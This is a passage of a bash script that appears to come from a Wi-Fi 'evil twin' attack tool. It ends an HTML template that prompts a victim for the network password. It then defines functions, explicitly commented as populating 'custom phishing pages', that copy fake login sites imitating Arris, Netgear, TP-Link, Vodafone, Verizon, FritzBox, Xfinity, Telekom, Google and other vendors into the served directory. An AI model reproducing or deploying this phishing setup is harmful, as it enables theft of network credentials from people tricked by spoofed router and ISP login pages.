<u>$Host_MAC</u></div> <div>Channel: <u>$Host_CHAN</u></div> </div> <div style=\"text-align:center;\"> <br><label>$DIALOG_WEB_INFO</label></br> </div> <div class=\"ui-field-contain\" > <label for=\"key1\">$DIALOG_WEB_INPUT</label> <input id=\"key1\" data-clear-btn=\"true\" type=\"password\" value=\"\" name=\"key1\" maxlength=\"64\"/> </div> <input data-icon=\"check\" data-inline=\"true\" name=\"submitBtn\" type=\"submit\" value=\"$DIALOG_WEB_SUBMIT\"/> </form> </fieldset> </div> </div> <script src=\"js/main.js\"></script> <script> $.extend( $.validator.messages, { required: \"$DIALOG_WEB_ERROR_MSG\", maxlength: $.validator.format( \"$DIALOG_WEB_LENGTH_MAX\" ), minlength: $.validator.format( \"$DIALOG_WEB_LENGTH_MIN\" )}); </script> </body> </html>" > $DUMP_PATH/data/index.htm } # Functions to populate the content for the custom phishing pages function ARRIS { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/ARRIS-ENG/* $DUMP_PATH/data } function BELKIN { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/belkin_eng/* $DUMP_PATH/data } function NETGEAR { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/netgear_eng/* $DUMP_PATH/data } function ARRIS2 { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/arris_esp/* $DUMP_PATH/data } function NETGEAR2 { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/netgear_esp/* $DUMP_PATH/data } function TPLINK { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/tplink/* $DUMP_PATH/data } function VODAFONE { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/vodafone_esp/* $DUMP_PATH/data } function VERIZON { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/verizon/Verizon_files $DUMP_PATH/data cp $WORK_DIR/sites/verizon/Verizon.html $DUMP_PATH/data } function HUAWEI { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/huawei_eng/* $DUMP_PATH/data } function ZIGGO_NL { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/ziggo_nl/* $DUMP_PATH/data } function KPN_NL { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/kpn_nl/* $DUMP_PATH/data } function ZIGGO2016_NL { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/ziggo2_nl/* $DUMP_PATH/data } function FRITZBOX_DE { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/fritzbox_de/* $DUMP_PATH/data } function FRITZBOX_ENG { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/fritzbox_eng/* $DUMP_PATH/data } function GENEXIS_DE { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/genenix_de/* $DUMP_PATH/data } function Login-Netgear { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/Login-Netgear/* $DUMP_PATH/data } function Login-Xfinity { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/Login-Xfinity/* $DUMP_PATH/data } function Telekom { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/telekom/* $DUMP_PATH/data } function google { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/google_de/* $DUMP_PATH/data } function MOVISTAR_ES { mkdir $DUMP_PATH/data &>$flux_output_device cp -r $WORK_DIR/sites/movistar_esp/* $DUMP_PATH/data } ######################################### < INTERFACE WEB > ######################################## top && setresolution && setinterface
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